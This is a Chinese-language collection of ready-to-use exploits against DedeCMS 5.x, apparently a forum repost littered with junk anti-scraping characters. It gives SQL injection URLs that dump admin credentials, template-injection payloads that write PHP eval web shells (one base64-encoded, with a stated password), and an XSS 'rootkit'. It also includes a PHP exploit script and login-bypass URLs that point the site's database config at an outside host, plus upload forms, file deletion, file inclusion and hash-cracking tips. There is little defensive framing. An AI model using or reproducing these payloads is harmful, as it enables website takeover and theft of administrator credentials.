|
|
5 \: c% H+ {6 m+ o
Dedecms 5.6 rss注入漏洞
/ J& n. A! Y+ B, L- C' Xhttp://www.test.com/plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23'][0]=1
6 _5 m; n2 H9 t. T
4 t5 n" E5 I) b- D" ]. p' y$ y% z* B; m/ x2 s6 j+ S
% v3 w. h2 ?9 H$ x
: H5 Y* g& B) j+ O3 Y0 X! D3 M# I4 ^
/ r( U; B4 F8 o; H* E4 z/ N+ t2 H0 p& P- H
% |# ^! z: G: q. e: y6 ]9 N: q9 s* B) M& j4 L3 b& ^
DedeCms v5.6 嵌入恶意代码执行漏洞 P% V2 Q3 m o3 y! e7 ]
注册会员,上传软件:本地地址中填入 a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57}+ A8 p2 s& I7 A9 {& H4 O9 j
发表后查看或修改即可执行
5 y9 c) I; f4 K1 Za{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
4 d0 T& G; V( T9 `生成x.php 密码xiao,直接生成一句话。
o1 }3 Z" ]5 b) x0 u4 W, s
# \* U0 n* N5 b6 `9 j0 G& z( Q0 S# p$ ?( k
3 L: k& ^% T) f. O/ e
Y# Q; w* q) ]8 I9 }4 B1 ]' R
: M0 ?9 g( g( f& ~! q" C# m1 v+ r# O' S/ O
* ~/ ~! i2 z% Y! V( U' h+ E8 _2 Q7 r2 o4 t7 M$ M6 i4 G
Dede 5.6 GBK SQL注入漏洞; c9 W' y% x2 @7 O' I; T
http://www.test.com//member/index.php?uid=''%20||%20''''%20||%20''%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'';
, Q9 X: l7 N1 _% c6 e1 j2 t$ hhttp://www.test.com//member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe) }4 G6 ]" |% j/ H4 l+ b
http://www.test.com/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7
& ^9 A. ~; ~+ f0 f
" w+ w- S2 P1 y/ I6 Z; w, E1 B
/ B1 C2 H+ W2 y$ ~& f
8 p- M- d! _5 D/ \4 V8 O: [& O% I, A4 l$ ^& i" H
$ _+ A0 y& m# u; ]
1 W( i+ h; t8 ]* F0 K
3 n; T5 A4 a8 s9 }
* _' L2 Q! ~9 o1 l# S1 XDedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
; }; l3 K0 ^. N6 { A: d3 c, o5 Jhttp://www.test.com/plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` ; B& l4 P. l! h& x
8 D. W+ Z: G5 s- T s I# e% F0 z+ ?. ?4 M. g' o9 K/ M
, v/ i/ K* a+ ~/ |+ ~ F' y
1 }# g) {) ^' K: O7 v0 z: T, \* \ G) t& { ^
3 z$ ^; r' o1 b% t& A) RDEDECMS 全版本 gotopage变量XSS漏洞
: J# F# P; l E+ L6 o1.复制粘贴下面的URL访问,触发XSS安装XSS ROOTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器。
2 `! i9 O1 W9 x" Y1 `http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
$ b, A1 h" ^, S$ {' ?
! C3 Q1 F% @; z4 t) U% X. ^) l! d9 q% I2 J0 X' V! n
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。
' ?! D$ F+ y" r' I* g- ^8 j2 P; Ghttp://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasda2 S* ^, Z! @0 }' A
4 r9 f% e; A8 V% k
( ]1 n6 c& W! g& J
http://v57.demo.dedecms.com/dede/login.php8 N5 _5 r0 [. _2 c" N, O* y
; m& f9 v' v6 o9 a8 @: ^8 A1 n
8 t1 J( V$ _% w3 p* x5 H4 C% M
color=Red]DeDeCMS(织梦)变量覆盖getshell
! B# m0 S/ b A4 a- a#!usr/bin/php -w/ {- g/ U1 _: Y7 E9 T. i
<?php* q0 B+ e/ o" E8 L$ S6 l
error_reporting(E_ERROR);+ Y. J. j! I, H) W. a
set_time_limit(0);) W P9 m: G) g1 A/ A
print_r('
2 c' A! a3 d) I9 y0 ODEDEcms Variable Coverage% M# j$ N2 n4 S$ `
Exploit Author: www.heixiaozi.comwww.webvul.com
( s* X- a$ C6 N" u6 k' r);! ~5 ~% Z) W1 y7 ^
echo "\r\n";: w8 q* l, j( h% N: K. b
if($argv[2]==null){
% F" u6 H& P* h$ D4 tprint_r('
% i4 {/ F" }1 U- z) o& ]' H+---------------------------------------------------------------------------+
2 d& g- c; A) a2 V4 W& tUsage: php '.$argv[0].' url aid path7 Q3 G/ o! t' [6 {* K
aid=1 shellpath /data/cache aid=2 shellpath= / aid=3 shellpath=/plus/( S4 d. L* o- r# S/ ?
Example:& B6 n0 m. [ m; ]2 T% g |
php '.$argv[0].' www.site.com 1 old
1 B+ `& H5 m, }+---------------------------------------------------------------------------+
: C3 Z; t9 Y8 \9 c% R');/ l$ U- |. ], o& s, s# w
exit;
, |4 j: z1 B/ V* L; \$ W2 ]9 T}0 m0 E" ^9 N% |# Y
$url=$argv[1];
6 r a) j5 o, z M" P$aid=$argv[2];
x# D* }; x/ ?$ c$path=$argv[3];
; I% T& j2 X4 s" V$exp=Getshell($url,$aid,$path);
5 S5 u" R) |1 Z4 m$ uif (strpos($exp,"OK")>12){
: U; }# C$ w0 M& \$ lecho "
! X6 a9 S) R; g. wExploit Success \n"; U! c3 ^! w% U. N2 h2 H
if($aid==1)echo "
7 [* q% D: m B1 u1 Y- p, h- ^/ sShell:".$url."/$path/data/cache/fuck.php\n" ;) \5 P- ^; {% K0 w
: G" i# B3 A p2 C% l2 h! k% B7 x- x$ H2 n, n
if($aid==2)echo "2 m! r/ s1 k% Q& n5 T
Shell:".$url."/$path/fuck.php\n" ;# v* w$ d; z0 h0 F J
! C: @% {4 v/ r5 R' _( S) |6 u% N5 `+ |! |5 E
if($aid==3)echo "/ I6 {) o0 p3 s6 A* L* D
Shell:".$url."/$path/plus/fuck.php\n";/ h: S; e) Q' H
9 `5 C" ~! S5 `3 r7 W) T3 U$ L4 l' e9 ^' a5 q% G! G% ]
}else{
6 ^: {# L% `0 d9 P% a# R8 Uecho "
: b2 s5 J$ H9 F2 @8 y7 PExploit Failed \n";
- {% o" U4 }' }; f, ~- t}
' }% n5 C0 \$ W& V) q+ L% p8 `: y2 ufunction Getshell($url,$aid,$path){. R& }0 n$ P; p1 Z2 T
$id=$aid;1 F7 \: H# X( U8 Q3 O
$host=$url;! X) @4 t% O- Z+ s+ B
$port="80";
3 o. k0 P8 O$ q/ G/ j* | h$content ="doaction=http%3A%2F%2F$host%2Fplus%2Fmytag_js.php%3Faid%3D1&_COOKIE%5BGLOBALS%5D%5Bcfg_dbhost%5D=184.105.174.114&_COOKIE%5BGLOBALS%5D%5Bcfg_dbuser%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbpwd%5D=90sec&_COOKIE%5BGLOBALS%5D%5Bcfg_dbname%5D=exploit&_COOKIE%5BGLOBALS%5D%5Bcfg_dbprefix%5D=dede_&nocache=true&QuickSearchBtn=%CC%E1%BD%BB";
2 z, K# v' Q; s9 g, X- M$ h$data = "POST /$path/plus/mytag_js.php?aid=".$id." HTTP/1.1\r\n";& B1 Z# S' l0 ^1 J4 L* i
$data .= "Host: ".$host."\r\n";
3 V+ F$ Y1 `; f$data .= "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:5.0.1) Gecko/20100101 Firefox/5.0.1\r\n";
5 D7 H& w3 O$ U: I% s# K4 b$data .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
2 `1 ^1 }; ]8 K' l1 U7 [$data .= "Accept-Language: zh-cn,zh;q=0.5\r\n";2 a4 l) d6 ~; q2 i
//$data .= "Accept-Encoding: gzip,deflate\r\n";% K6 V: g# g8 k% }$ V4 g
$data .= "Accept-Charset: GB2312,utf-8;q=0.7,*;q=0.7\r\n";2 f7 m6 t5 G f. ?) C
$data .= "Connection: keep-alive\r\n";
7 L6 r$ {+ |$ \7 f$data .= "Content-Type: application/x-www-form-urlencoded\r\n";* ^0 ^2 C0 D5 D: l& X- y
$data .= "Content-Length: ".strlen($content)."\r\n\r\n";) w8 b( N& a: g; ^% V, R
$data .= $content."\r\n";6 P; A" {. X4 F2 F* y0 L8 A
$ock=fsockopen($host,$port); g) h2 m3 E/ i3 R2 l
if (!$ock) {2 |; h5 W$ w% H3 a* g
echo "$ b& Q% _0 G" ~3 E
No response from ".$host."\n";, H1 @2 S3 O; V
}' w4 \) Y2 d S" O
fwrite($ock,$data);
2 p. J0 L3 ^" {3 a5 j' M: ~while (!feof($ock)) {9 _0 {0 \7 D- b, I
$exp=fgets($ock, 1024);
! b+ O4 S9 u8 u X3 Z- areturn $exp;$ S% ]/ k) v. L0 d' n+ M) Y2 u. a
}
2 |: [' m; R5 K p( b}* m! _9 t6 ?' E
, H, R1 h7 q: `5 m6 u
! P, h" o" z3 a: ]. h: v?>
3 s3 _/ w% l7 ~1 q/ e/ d
) q& X' Y b- U3 i+ Q$ _9 y5 J% K( E y
4 S3 @4 |( W8 m3 x% B% D
5 o! d# k- o2 X5 k& ~0 z5 |: v8 P
% }/ h8 P1 h- R- t5 ]$ s7 g" z
) J" K: b' j, E1 f- Y
% s! }4 y! M1 I, h6 W9 J- m& E9 ~% a. I9 W* i
& z$ t! M" i$ P; f5 D$ a- x- a: X
DedeCms v5.6-5.7 越权访问漏洞(直接进入后台)6 n* G j V# T+ p/ F
http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root
: V; b9 v& d" u- E8 R: S
: [5 q. Z3 N9 c8 \ [: B, r1 F3 r8 j7 h! {
把上面validate=dcug改为当前的验证码,即可直接进入网站后台
2 h6 i; S) Y7 h I
+ p5 }$ E2 P$ b( a8 T- p$ e4 Y% M1 l' V( j$ ?' V
此漏洞的前提是必须得到后台路径才能实现% @) r) S6 o$ S* _" L: v3 {
) V6 @$ P6 N' ^3 Y6 [6 ?% [$ F
, x) @& f, Y$ `7 Z
& ]2 v1 q, T$ `+ w5 r, C2 |- Q) Y6 Y3 I) M( E" C
3 a; a" C% f1 l5 `5 m
& c6 g# [8 D$ i* ^7 {( X8 d% N5 y4 f! \1 A- s
; A1 ?: Z) a4 d
$ _, Q7 E: |/ V2 T/ i/ x5 ^: }
* C: ?. Z. u# o V W, x/ J+ b" HDedecms织梦 标签远程文件写入漏洞
" F6 }5 C/ q* o! c0 x: h o前题条件,必须准备好自己的dede数据库,然后插入数据: insert into dede_mytag(aid,normbody) values(1,''{dede:php}$fp = @fopen("1.php", \''a\'');@fwrite($fp, \''\'');echo "OK";@fclose($fp);{/dede:php}'');8 J. Q/ M5 E' N+ d3 G/ C7 j
6 p; d- a- f1 p5 ?( t6 l
& J+ w' T+ [3 ]) S! `. ~再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
* c! Z! g, L' A- b( O8 h4 d<form action="" method="post" name="QuickSearch" id="QuickSearch">
1 ~+ d. H. f; \/ l<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
. V L1 q" `. `<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
& h' Q! p% A% X" G<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />2 V/ i3 K! l3 L% v. [; z$ a+ \
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
3 e. `7 R1 v0 { i, p. E8 r9 K<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />+ V1 F7 ?( R/ F6 N# _
<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />: H S+ o, z* m* f. X3 x
<input type="text" value="true" name="nocache" style="width:400">3 W$ J G2 C p$ q
<input type="submit" value="提交" name="QuickSearchBtn"><br />! e1 M" P1 g0 f
</form>
. `0 M3 z: ^9 R<script>
3 S' V9 D: c6 U! a5 p, ofunction addaction()' n" G$ \3 N# \- B3 s
{
6 p2 n7 z0 i9 p+ I1 n" N+ idocument.QuickSearch.action=document.QuickSearch.doaction.value;
( c% q0 Z; m4 ?: |$ b! Q$ [- w! `}
0 ]1 P4 V' j0 O7 k</script>
F# v5 v* M, ~; C. \6 c3 i' x( S% x
7 A* R3 I0 Y \5 P2 e# S1 `3 t" r0 e& U" I v* w d
2 T% l5 V# T5 X5 ] y
' Z2 Y, z4 p z6 M& ~- u& Y. m9 A/ J# g; p6 m( u: C5 r
, q7 ^% K5 S3 s' d3 I3 p
& t/ t" N) D5 x1 @0 l* p! L
$ f; z' E( X% r( [$ ~# J. r& s4 m+ M: r% A% E5 |, \( {
DedeCms v5.6 嵌入恶意代码执行漏洞
- Y1 E8 u2 r7 a) {! y注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行5 P% ?, k i! e) L; m
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
9 ?! d- I O$ Y8 R4 }% b4 n/ O生成x.php 密码:xiao直接生成一句话。密码xiao 大家懂得; \1 q5 \7 C3 g4 R6 b- U
Dedecms <= V5.6 Final模板执行漏洞
% `, s8 \9 e* v注册一个用户,进入用户管理后台,发表一篇文章,上传一个图片,然后在附件管理里,把图片替换为我们精心构造的模板,比如图片名称是:; t7 K5 u+ J' M0 y
uploads/userup/2/12OMX04-15A.jpg# Q% M: v& O% k" a+ |% ]+ G
( ^# A" y8 U* y# T* v8 f* ]% t
6 ?2 q% X3 ^( I6 Z8 F4 l- a, i4 ]8 L
模板内容是(如果限制图片格式,加gif89a):
^, L) I$ K$ L" F" G6 I% g+ p{dede:name runphp='yes'}! g4 X0 u: K" G: G) ~* i" k
$fp = @fopen("1.php", 'a');
! R3 Q1 F3 F4 Q- W [@fwrite($fp, '<'.'?php'."\r\n\r\n".'eval($_POST[cmd])'."\r\n\r\n?".">\r\n");
0 c ^$ E: o1 M7 R@fclose($fp);; l! @9 s' C! o0 J9 B1 C7 p
{/dede:name}
) y9 e! l, @% ^$ D5 N2 w; U& M2 修改刚刚发表的文章,查看源文件,构造一个表单:
( L/ A' f& S+ z9 G, I4 s% A<form class="mTB10 mL10 mR10" name="addcontent" id="addcontent" action="http://127.0.0.1/dede/member/article_edit.php" method="post" enctype="multipart/form-data">+ Y7 |$ f# u6 X) f# U# g
<input type="hidden" name="dopost" value="save" />
/ G* V- J6 f. C0 R9 U- G4 {: s<input type="hidden" name="aid" value="2" />
( A2 Y; i( f! z9 `% y& ~5 w4 P<input type="hidden" name="idhash" value="f5f682c8d76f74e810f268fbc97ddf86" />' h( o4 T$ ^3 W7 S
<input type="hidden" name="channelid" value="1" />! R2 q0 o) r$ T
<input type="hidden" name="oldlitpic" value="" />: ~9 G' S. h) |, U
<input type="hidden" name="sortrank" value="1275972263" />" g3 q2 D4 i" ^
9 B/ ]+ h8 m" W# h k
( i1 I) ^( A6 _: `7 i- ]<div id="mainCp">
. N. ~. b, B( B<h3 class="meTitle"><strong>修改文章</strong></h3>
4 F, [0 ?1 J7 V/ _% N/ r! U3 Q7 w8 i. ^3 H
' z6 B/ d. N! t( I7 c' j, b<div class="postForm">
7 v. p' [! j" o6 a, j, P1 G<label>标题:</label>, `6 p i; x3 B# y( i b
<input name="title" type="text" id="title" value="11233ewsad" maxlength="100" class="intxt"/>
$ C2 j/ |' {0 `5 l% `# Y/ I8 V! H! T" E$ K. Q8 m; `& p& p
0 c9 p7 r+ E+ k& I
<label>标签TAG:</label>- j% e: H* d7 F8 c
<input name="tags" type="text" id="tags" value="hahah,test" maxlength="100" class="intxt"/>(用逗号分开)
: u, K* y. G/ [) I, [8 R2 A& Q. q4 I# w3 T" J5 {
+ K# p B0 ]" r" B, I3 k<label>作者:</label>
: z( K7 t- }, u<input type="text" name="writer" id="writer" value="test" maxlength="100" class="intxt" style="width:219px"/>$ G8 S' f# r- D' {% L
1 c K- u9 g1 S+ f3 M% X8 G3 E4 ^* r3 d+ G" J; H
<label>隶属栏目:</label>
- a5 G+ _; Z* R<select name='typeid' size='1'>- c2 G- \: z& S5 W% s6 n( s; u$ o8 u8 S
<option value='1' class='option3' selected=''>测试栏目</option>
0 T, @6 r5 R& a: U P5 [" d</select> <span style="color:#F00">*</span>(不能选择带颜色的分类)
! _2 L7 X- r. C* C# d2 ~* {
* C1 P% P* }6 J! @# o: `! D5 q5 h% U) f+ N
<label>我的分类:</label>
1 X' \8 a! r/ o8 E2 m6 `<select name='mtypesid' size='1'>) y! M% U! q! O7 T+ X! f: q
<option value='0' selected>请选择分类...</option> }' W8 U( [# \! ^8 C
<option value='1' class='option3' selected>hahahha</option>
; ~" W3 z. F% G4 u) X4 Z</select>6 ^" w6 Q: t# c6 g7 y1 F1 }
2 C- `- E- _8 R$ @! g. u/ z* @, m: s6 Z, i8 s
<label>信息摘要:</label>
+ R0 Y* a+ d! ?) H f<textarea name="description" id="description">1111111</textarea>
& }% w3 R e2 p0 g5 j(内容的简要说明); {5 `8 J/ p# X& p* B7 k
; b: ]8 b8 _" l$ I3 ?. N: [3 f; x' Q5 [% t6 n Y
<label>缩略图:</label>/ d9 l- s6 b' w
<input name="litpic" type="file" id="litpic" maxlength="100" class="intxt"/>4 M, N: \, R: y( q R: O
* j- A4 g/ [" `: W7 Y* ?5 n5 ^* w0 [1 c3 M2 m" L; ?4 [' a
<input type='text' name='templet'8 F6 F* U. B8 b9 I
value="../ uploads/userup/2/12OMX04-15A.jpg">
?9 s- v8 ~; I. }<input type='text' name='dede_addonfields'
+ \! X5 `& l4 w4 M) Ivalue="templet,htmltext;">(这里构造)" j* X* S ]/ f% U3 d# q) W
</div>
1 {1 r) Y8 B8 X- B Q1 d0 q2 s9 X) Q3 t
: d: v1 H7 W8 S. m) Z. w' m" F4 e
<!-- 表单操作区域 -->1 L( e8 `) J( k. k
<h3 class="meTitle">详细内容</h3>
0 n6 X/ C6 c9 P5 I0 i, ^0 n4 l: L8 J0 `5 W, u; G+ u% K6 x
$ R$ b( r6 f& I5 R/ D' w<div class="contentShow postForm">1 Q& k$ w% j% K) Q, b( Q8 R
<input type="hidden" id="body" name="body" value="<div><a href="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" target="_blank"><img border="0" alt="" src="http://127.0.0.1/dede/uploads/userup/2/12OMX04-15A.jpg" width="1010" height="456" /></a></div> <p><?phpinfo()?>1111111</p>" style="display:none" /><input type="hidden" id="body___Config" value="FullPage=false" style="display:none" /><iframe id="body___Frame" src="/dede/include/FCKeditor/editor/fckeditor.html?InstanceName=body&Toolbar=Member" width="100%" height="350" frameborder="0" scrolling="no"></iframe>
6 d. F4 J5 ^' K. ^, ], K$ ]4 k! y' l$ g. F
* v4 N% L4 ^: I$ e$ }4 `<label>验证码:</label>! w8 W7 }4 l: ] B5 o# ]/ l% X
<input name="vdcode" type="text" id="vdcode" maxlength="100" class="intxt" style='width:50px;text-transform:uppercase;' />$ }' ?. `! f7 C4 {8 V$ j7 \
<img src="http://127.0.0.1 /dede/include/vdimgck.php" alt="看不清?点击更换" align="absmiddle" style="cursor:pointer" />8 J) C# A' q+ j3 v* e# K+ H' W' P
% [8 D3 v; T5 s( O+ [# {# G; L) n
# A, T' R2 |' ]2 M0 ?/ f<button class="button2" type="submit">提交</button>
) X+ V0 N0 Z/ Y: @8 J2 Q8 O; h<button class="button2 ml10" type="reset">重置</button>
. |5 i: [! I; M</div>
; k6 h9 S9 \& F0 ]. }/ }; ?- b* e& I
& ]- C3 D% F. M$ U9 Z# @3 t: E
</div>- o- W' `: h9 S* \2 `! q0 Z
; y4 T2 a1 u) s) q, i: X
2 V* F3 P+ m6 ~2 V1 {2 ~: q2 ^7 B</form>* c' ~4 I/ K; h
& ^2 s- D; } b" G, _1 n3 Q2 ?) H
( H# B6 g) h) |) Z; l6 h# ?1 Q& t提交,提示修改成功,则我们已经成功修改模板路径。 3 访问修改的文章:
# w7 Q3 h. E2 J% U. a7 I' i* [假设刚刚修改的文章的aid为2,则我们只需要访问:
4 _: h; i# D2 V3 O5 Zhttp://127.0.0.1/dede/plus/view.php?aid=2
2 V% X( g' a$ k2 }即可以在plus目录下生成webshell:1.php
; V B1 s( \% V: s4 C0 v# q
* o" j; V9 n" a% i0 U" B" f+ e$ O: B! f
$ ?- {1 \4 I- [$ Y2 k* O* x$ z
# }, l9 ?/ f! _- L
" A1 i M0 n5 Q# D$ h, ~6 q5 Q* t2 x9 g7 Z+ [! r
9 Z/ i" @6 S# ^+ i! v5 V- e4 _" y' G7 ]$ m3 C- R- ?
" y8 ]& e! K) I/ G+ o$ h
1 J3 V/ _. q8 l' _$ D
" m0 R# ? v1 O+ j$ c
1 l7 R1 Q! j+ B2 G1 I0 k& VDEDECMS网站管理系统Get Shell漏洞(5.3/5.6)
& l* l6 ~" e1 iGif89a{dede:field name='toby57' runphp='yes'}
" H$ P$ A0 }" {! D8 O2 |phpinfo();% B* r: Q3 c$ v" _. _; O
{/dede:field}
: m, s' u8 l% f8 q5 A保存为1.gif% ^" r, W* n" W0 O
<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/uploads_edit.php" method="post" enctype="multipart/form-data" ">
, S2 X- U3 \7 z2 c7 T* p, q; v<input type="hidden" name="aid" value="7" /> . L6 n( B# Z# x9 Z
<input type="hidden" name="mediatype" value="1" /> ; d4 u" V( c4 ?- [" m! j# E7 d+ ]- F
<input type="text" name="oldurl" value="/DedeCmsV5.6-GBK-Final/uploads/uploads/userup/3/1.gif" /></br> + n c5 z9 [: B( v* f1 J! }, i" k
<input type="hidden" name="dopost" value="save" /> 7 D+ c; i1 ^5 P8 D- P4 g0 L
<input name="title" type="hidden" id="title" value="1.jpg" class="intxt"/>
4 ~; n3 d- V) H- m& } E; s5 R3 P<input name="addonfile" type="file" id="addonfile"/>
/ @( K! h6 N1 D( Q& O5 p/ @<button class="button2" type="submit" >更改</button> , B2 m& U& t3 B) g7 O! f+ k
</form> % q, r. Y5 `. y0 N7 x' v
. b4 d; q- }' {5 q& C4 _
& ]& n5 l0 F* M
构造如上表单,上传后图片保存为/uploads/userup/3/1.gif
$ T( D1 Y9 d. y9 ~6 M9 w发表文章,然后构造修改表单如下:4 w+ z" ^8 d7 {0 j% w* }1 z
9 N/ Z; O& r) [- I# n q( [
1 P6 t8 S& p4 Z! \% ~# k" i; W<form action="http://192.168.1.5/DedeCmsV5.6-GBK-Final/uploads/member/article_edit.php" method="post" enctype="multipart/form-data">
4 Z# d7 z! S% |1 U1 K1 {<input type="hidden" name="dopost" value="save" /> $ P' r& D& w' O. K1 L0 |) v
<input type="hidden" name="aid" value="2" />
( q% ?. v( G$ [+ [& U<input type="hidden" name="idhash" value="ec66030e619328a6c5115b55483e8dbd" />
; U7 F3 }" n" ?6 s<input type="hidden" name="channelid" value="1" /> & j' S% {; j& [6 a$ s D# R% b
<input type="hidden" name="oldlitpic" value="" />
2 ?. Q, u1 p+ P4 z ~! K2 D<input type="hidden" name="sortrank" value="1282049150" /> 9 O/ N' V/ K+ r5 i( V
<input name="title" type="text" id="title" value="aaaaaaaaaaaaaaa" maxlength="100" class="intxt"/> 4 d7 |* ^ X$ M9 I- M: U7 g
<input type="text" name="writer" id="writer" value="123456" maxlength="100" class="intxt" style="width:219px"/> & Z) D; Z* |$ m0 ^4 A& N( H
<select name='typeid' size='1'> , m, e. }- Z: p
<option value='1' class='option3' selected=''>Test</option> , a8 H, t9 Z; i0 [, j
<select name='mtypesid' size='1'>
[: C5 A( l5 ]# {<option value='0' selected>请选择分类...</option> / i/ o G6 f6 {" Q- ?
<option value='1' class='option3' selected>aa</option></select> # b: D; b. E5 n @
<textarea name="description" id="description">aaaaaaaaaaaaa</textarea>
1 X/ |! a8 ~% V' H/ v% u<input type='hidden' name='dede_addonfields' value="templet">
1 r) Q, B9 n, D0 f2 K2 c<input type='hidden' name='templet' value="../uploads/userup/3/1.gif">
2 G, I" X' S8 w<input type="hidden" id="body" name="body" value="aaaa" style="display:none" />
' W2 S+ D- E& m: C w9 N<button class="button2" type="submit">提交</button>
* x% S+ H: I, U: h( @</form>, a! B1 a* \8 B; Z" x; }+ C( }0 I
3 v6 B# k2 i& j- @1 e3 X
8 r+ N: [- t# M9 z: `% g; Z
) x/ \" K. d$ T1 u( `' d! L T1 F) v! H! P ]& I; U$ s+ ~1 \
( c. F, G& D3 h5 B6 m
% @+ w# x, n( g2 K* k) ~5 J
" A3 ^" I' s. F/ z/ e q) q
- K' [! k& B- v. t% G) h- f) k4 c/ @& R6 U5 W
3 h% t& [% n/ c) @% z
3 s( L" l) |! `% D
9 Z% B U5 A- u% I7 P
织梦(Dedecms)V5.6 远程文件删除漏洞$ J5 r/ m: L6 b+ A" U( d/ V
http://test.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
& \4 [7 |) B/ |. M. l! Y) [9 f* H
& N* ], t$ w: C" C; Y# [ y* l$ Q1 \! O3 N6 D* t' |
s" k' W" B( U
4 x0 g6 Q4 {1 g: T0 y. H
1 m k* ]) M0 @& g+ [. y M$ c4 C( b
i6 b! h9 M0 d* Z6 g6 X9 s
/ Z2 z- g I% `& V, M3 H
# M. f& h& o1 a: n4 J" ]2 z {4 k& i+ W+ I3 \
织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 + l1 w4 ?* C7 g; G
http://www.test.com/plus/carbuya ... urn&code=../../
6 D! z; |2 o: ]) k- `5 {/ [" n/ C2 ^* y5 S& z/ }3 B+ A, V
/ a+ F; \! o0 n; i0 J: Y' E% O6 i- q
6 V# F( Z, Z* ^. t9 C' P" J M
$ w; R, l8 [) T5 A1 B" d
. u, Z4 E* f; l& C2 o* {8 E* ~* j9 N
8 E4 d ]0 I" c; V8 @. ^4 P7 C
3 t2 X0 K- M N5 R. a/ [+ a0 x, _+ \) m* v, A
) {2 {, _: z# f& x' v
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞
/ a* Y1 A9 a3 v2 d5 j4 s, C' {5 Qplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin`2 i4 d. y. n, U4 i1 U
密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5
! l' B4 ]( U2 X# ]+ S: {3 K- o; r3 n" Z$ ?' b8 B5 J
8 q5 e6 s( A% v7 I2 m: Y- f+ _; A- h1 n2 ?
5 L& M2 K' p. V, ^1 a. M$ L
* Y5 J1 {+ N' A% Y# @/ \
, P; i& Y8 e; H0 c9 v4 ^
1 p2 s1 Z3 q& w, ~& ~$ J* u) x9 Z: `5 M- A/ ^
7 [, x( |# H6 z d. y' m2 ~5 l/ U
& o7 I3 y0 a- u% U
织梦(Dedecms) 5.1 feedback_js.php 注入漏洞; `( G1 Y- b. Y) c1 n
http://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''='
' {) z$ y8 I7 S- W, s
! L' [+ C3 Y/ T6 k# p _8 s. T9 D2 ^9 Q+ M0 w }
/ O6 @9 H; T" h' q- B9 w$ N8 Q; o3 \; v" @ n8 Y
5 `0 v! g5 l# r1 l4 F
' I8 @0 @ S$ `. T8 Z) D
3 u' U$ q/ F3 ~2 D+ [9 `
! \& u# U/ T$ D9 ]- \# ^ j. d, m' Z+ A8 ~
' q/ I3 \# w0 F. n织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
